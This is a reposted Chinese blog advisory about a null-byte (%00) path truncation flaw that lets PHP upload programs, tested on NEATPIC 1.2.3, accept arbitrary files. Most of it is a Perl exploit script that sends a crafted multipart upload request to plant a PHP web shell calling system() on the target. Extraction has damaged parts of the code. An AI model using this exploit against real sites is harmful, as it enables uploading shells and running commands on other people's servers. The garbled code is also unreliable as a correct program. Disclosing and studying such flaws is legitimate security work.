PHP网站警报,多种PHP程序过滤漏洞(转)[@more@]
危害:直接上传任意文件
漏洞描述:
当PHP程序有指定PATH时,在PATH文件后门加入%00可以上传任意文件.
测试程序:NEATPIC PHP目录直读版 1.2.3
http://web.cncode.com/SoftView.asp?SoftID=1820
此文档参与者:
漏洞实验者:Xiaolu,Lilo,SuperHei,Darkness [All BST Members]
Http://Www.Bugkidz.org
Xiaolu提供了一个漏洞利用程序:
#!/usr/bin/perl
$
= 1;
use Socket;
$host = "127.0.0.1";
$port = "80";
$UploadTo = "";
$str =
"-----------------------------7d41f4a600472 ".
"Content-Disposition: form-data; name="path" ".
" ".
"./php.php%00 ".
"-----------------------------7d41f4a600472 ".
"Content-Disposition: form-data; name="image"; filename=
"F: ools1.gif" ".
"Content-Type: text/plain ".
" ".
""system($c); ".
"?> ".
"-----------------------------7d41f4a600472-- ".
" ";
print $str;
$len=length($str);
print $len;
$req ="POST /index.php?action=upload HTTP/1.1 ".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/msword, application/x-shockwave-flash, */* ".
"Referer: http://127.0.0.1/index.php?path=. ".
"Accept-Language: zh-cn ".
"Content-Type: multipart/form-data; boundary=----------------
-----------7d41f4a600472 ".
"Accept-Encoding: gzip, deflate ".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT
5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322) ".
"Host: 127.0.0.1 ".
"Content-Length: $len ".
"Connection: Keep-Alive ".
"Cache-Control: no-cache ".
"Cookie: PHPSESSID=111111111111111111111111 ".
" ".
"$str ";
print $req;
@res = sendraw($req);
print @res;
#Hmm...Maybe you can send it by other way
sub sendraw {
my ($req) = @_;
my $target;
$target = inet_aton($host)
die("inet_aton problems ");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
0)
die("Socket problems ");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S);
$
= 1;
print $req;
my @res = ;
select(STDOUT);
close(S);
return @res;
}
else {
die("Can't connect... ");
}
}
本文来自:http://www.linuxpk.com/30642.html
-->linux电子图书免费下载和技术讨论基地
·上一篇:
取得龙客联盟的文章管理系统的权限攻击
·下一篇:
深入了解MicrosoftAccess安全性
| ||
关于我们 | 联系方式 | 广告合作 | 诚聘英才 | 网站地图 | 网址大全 | 友情链接 | 免费注册 | ||
| ||
Copyright © 2004 - 2007 All Rights Reserved 来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10763080/viewspace-970190/,如需转载,请注明出处,否则将追究法律责任。
上一篇:
菜鸟必看:发布黑客最初步的技术(转)
请登录后发表评论
登录
全部评论
<%=items[i].createtime%>
<%=items[i].content%> <%if(items[i].items.items.length) { %>
<%for(var j=0;j
<%}%> <%}%>
<%=items[i].items.items[j].createtime%>
<%=items[i].items.items[j].username%> 回复 <%=items[i].items.items[j].tousername%>: <%=items[i].items.items[j].content%>
还有<%=items[i].items.total-5%>条评论
) data-count=1 data-flag=true>点击查看
<%}%>
|
转载于:http://blog.itpub.net/10763080/viewspace-970190/